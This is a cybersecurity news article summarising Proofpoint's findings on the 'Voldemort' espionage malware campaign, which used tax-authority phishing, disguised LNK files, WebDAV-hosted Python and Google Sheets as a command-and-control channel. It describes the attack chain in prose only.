In a startling revelation, cybersecurity experts have uncovered a sophisticated malware campaign that exploits Google Sheets, a widely-used cloud-based spreadsheet application, as a command-and-control (C2) mechanism. The discovery, made by researchers at Proofpoint, highlights the innovative methods cybercriminals are employing in what appears to be a high-stakes espionage operation.
The Discovery and Modus Operandi
The campaign was first detected on August 5, 2024, and has since been linked to a series of phishing attacks impersonating tax authorities from various governments, including those in Europe, Asia, and the United States. The attackers, using a bespoke tool known as “Voldemort,” have targeted over 70 organizations across multiple sectors, including finance, technology, healthcare, and government. The sheer scale of this operation, with more than 20,000 emails sent to potential victims, underscores the potential impact of this threat.
The phishing emails are crafted to appear as urgent communications from tax authorities in countries such as the U.S., U.K., France, Germany, Italy, India, and Japan. These emails typically warn recipients about supposed changes to their tax filings and prompt them to click on a Google AMP Cache URL. This URL redirects the user to an intermediate landing page designed to inspect the User-Agent string of the victim’s browser, determining if the operating system is Windows.
If the system is identified as Windows, the page exploits the search-ms: URI protocol handler to present the user with a Windows shortcut (LNK) file. This file masquerades as a PDF document, using Adobe Acrobat Reader’s icon to deceive the user into thinking it is a legitimate file. Once the LNK file is executed, it triggers a series of actions that are as complex as they are effective.
The Technical Breakdown
Upon execution, the LNK file invokes PowerShell, which then runs Python.exe from a WebDAV share, passing a Python script located on another WebDAV share as an argument. This method ensures that no files are downloaded to the victim’s machine, a tactic that helps the malware evade detection by traditional antivirus programs. Instead, the dependencies needed to run the Python script are loaded directly from the WebDAV share.
The Python script’s primary function is to gather system information and send this data, encoded in Base64, to a domain controlled by the attackers. Once this information is exfiltrated, the malware displays a decoy PDF document to the user, maintaining the illusion of legitimacy. Simultaneously, it downloads a password-protected ZIP file from OpenDrive.
This ZIP file contains two components: a legitimate executable, “CiscoCollabHost.exe,” and a malicious DLL, “CiscoSparkLauncher.dll.” The latter, known as Voldemort, is a custom backdoor written in C that enables the attackers to gather further information from the compromised system and deploy additional malicious payloads. The malware’s use of Google Sheets for C2, data exfiltration, and command execution adds another layer of complexity, making this campaign particularly challenging to detect and mitigate.
A Unique Threat in the Cybersecurity Landscape
Proofpoint researchers have described this campaign as an unusual mix of advanced persistent threat (APT) tactics and techniques commonly seen in cybercrime operations. The use of file schema URIs to access external file-sharing resources for malware staging, particularly through WebDAV and Server Message Block (SMB), is a method increasingly popular among malware families that act as initial access brokers (IABs), such as Latrodectus, DarkGate, and XWorm.
The campaign’s reliance on Google Sheets as a C2 channel is not only innovative but also indicative of the evolving nature of cyber threats. By leveraging a legitimate, trusted platform like Google Sheets, the attackers are able to blend in with normal network traffic, making detection even more difficult.
Moreover, Proofpoint was able to analyze the contents of the Google Sheets used in this campaign, identifying six confirmed victims. Interestingly, one of these victims is believed to be either a sandbox environment or a known security researcher, suggesting that the attackers may have been testing their tools against more sophisticated defenses.
The Broader Implications
This campaign is emblematic of a broader trend in cybersecurity where threat actors are increasingly using legitimate cloud services for malicious purposes. The blending of sophisticated and rudimentary techniques—referred to by Proofpoint as a “Frankensteinian amalgamation”—complicates efforts to attribute the attacks to a specific group or nation-state. While the campaign bears the hallmarks of cyber espionage, the use of techniques popular in the e-crime landscape suggests that the attackers could have diverse motivations or a hybrid approach to their operations.
The discovery of this campaign comes on the heels of other significant malware developments, such as the latest version of the Latrodectus malware, which has also been observed employing advanced C2 methods and expanding its capabilities. As cyber threats continue to evolve, defenders must remain vigilant and adapt to the increasingly complex and blended tactics employed by malicious actors.
In conclusion, the exploitation of Google Sheets for C2 in this likely espionage campaign represents a new frontier in cybersecurity threats. Organizations must stay informed and adopt proactive measures to protect against these sophisticated attacks, which are becoming more difficult to detect and defend against as cybercriminals continue to innovate.
Follow us on (Twitter) for real time updates and exclusive content.
Interesting Article : Palo Alto VPN Used as Cover in New Malware Campaign Targeting Middle East Users
I just could not depart your web site prior to suggesting that I really loved the usual info an individual supply in your visitors Is gonna be back regularly to check up on new posts